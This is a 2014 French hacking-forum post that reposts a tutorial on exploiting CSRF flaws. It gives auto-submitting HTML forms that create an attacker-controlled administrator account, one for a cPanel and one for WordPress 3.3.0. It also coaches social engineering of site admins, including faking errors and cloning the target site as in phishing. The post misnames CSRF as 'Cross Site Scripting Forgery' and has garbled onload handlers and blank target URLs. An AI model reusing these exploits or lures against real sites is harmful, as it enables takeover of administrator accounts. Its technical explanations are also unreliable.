FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
La Faille CRSF

 
Ce sujet est verrouillé; vous ne pouvez pas éditer les messages ou faire de réponses.    FranceHack Index du Forum » Failles et Exploits » CSRF Sujet précédent
Sujet suivant
La Faille CRSF
Auteur Message
Mugiwara
Invité

Hors ligne




Message La Faille CRSF Répondre en citant
Bonsoir,


Aujourd'hui je vais vous présentez un tuto sur la faille CSRF.

Sommaire :
- La faille CSRF ? Cékoisa !
- Exploitation de la faille
- Grabbers
- Conclusion


Let's Go !


La faille CSRF ? Cékoisa !

La faille CSRF (Cross Site Scripting Forgery) est une faille qui qui nécessitera du Social Engineering sur le site que vous voulez.

Cette faille consiste à envoyer un lien modifié par vos soins à l'admin, pour executer des actions qui nécessite les droit d'admin, bannir un membre, supprimer une news, devenir admin etc .. Libre à vous de choisir ce que vous voulez 
Mais, (parce qu'il y a toujours un mais ) il faut que votre admin cible est ses cookies enregistrés car tous ça va se passer sans qu'il voit la couleur de la balle 

Exploitation de la faille :

Imaginons que notre site victime s'appelle : 
Ce site contient un cpanel :  ou http://www.site.com/cpanel
Nous allons essayer d'envoyer une page contenant un code malveillant, qui permettra d'ajouter un administateur avec les identifiants de votre choix.

Comme je suis gentil voici le script :

Citation :
<html>
<body onload="jfireForms()">
<form method="POST" name="form0" action="

<input type="hidden" name="login" value="votrelogin"/>
<input type="hidden" name="password" value="votrepass"/>
<input type="hidden" name="password2" value="votrepass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>


Remplacer le code en mauve par ce que vous voulez 
Mettez une redirection, et un peu plus de contenu pour que ça fasse plus réaliste 

Maintenant faisons un peu de SE :

Prétextez une erreur, un echec de connexion, ou autre, soyez inventif 
Je vous conseil, comme pour le phishing, de faire un vieux copié/coller du site cible pour que ce sois crédible 

Ensuite, priez pour que les cookies sois activés !

Si tous ce passe pour le mieux, c'est bon votre compte admin est creer et vous avez libre accès au cPanel, pour faire des petites bêtises 

Grabbers :

Voici des scripts d'exploitation, grabbers :

Celui ci est de Psymon, pour des sites sous WordPress 3.3.0 :

Citation :
<html>
<body onload="jdocument.forms[0].submit()">
<H2>CSRF Exploit to add Administrator</H2>
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
<input type="hidden" name="action" value="createuser"/>
<input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
<input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
<input type="hidden" name="user_login" value="admin2"/>
<input type="hidden" name="email" value="admin2@admin.com"/>
<input type="hidden" name="first_name" value="admin2@admin.com"/>
<input type="hidden" name="last_name" value=""/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="password"/>
<input type="hidden" name="role" value="administrator"/>
<input type="hidden" name="createuser" value="Add+New+User+"/>
</form>
</body>
</html>

Conclusion :

En conclusion, cette technique fonctionne vraiment bien ! Et est très puissante si je peux dire, si vous voulez justement corrigé cette faille je vous conseil un cours sur le site du zero -> 




SE TUTORIEL N'EST PAS DE MOI JE NE FAIS QUE PARTAGER


Ven 3 Jan - 00:03 (2014)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Ven 3 Jan - 00:03 (2014)
Montrer les messages depuis:    
Ce sujet est verrouillé; vous ne pouvez pas éditer les messages ou faire de réponses.    FranceHack Index du Forum » Failles et Exploits » CSRF Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com